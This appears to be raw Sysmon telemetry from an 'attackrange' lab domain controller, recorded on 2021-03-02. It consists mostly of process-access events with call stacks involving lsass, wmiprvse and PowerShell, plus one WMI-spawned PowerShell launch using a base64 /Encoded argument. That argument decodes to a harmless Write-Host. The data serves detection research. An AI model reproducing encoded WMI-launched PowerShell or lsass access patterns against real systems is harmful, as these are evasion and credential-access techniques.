10341000x80000000000000002242525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002242524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_blroqrnt.1uq.ps12021-03-02 16:54:42.920 10341000x80000000000000002242523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D5AA-00000000AD01}15664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.908{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Encoded VwByAGkAdABlAC0ASABvAHMAdAAgADEAMAAzADEAYgBiADQAOQAtADMAOAAzADMALQA0AGQAMgA5AC0AYQAyADcAMwAtADMANwAwADUAOAA3ADEAMAA2ADgAYwA2AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000002242513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.904{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=738A2CBCC3EC7CD6AD190B36560DE1ED,SHA256=58E14E2EA4D77E761DF4A6AA1CE38D0A3E9D12F70FCF57B847BC904EA908894E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.889{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D3AA-00000000AD01}15816C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D1AA-00000000AD01}5496C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CFAA-00000000AD01}13372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.875{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 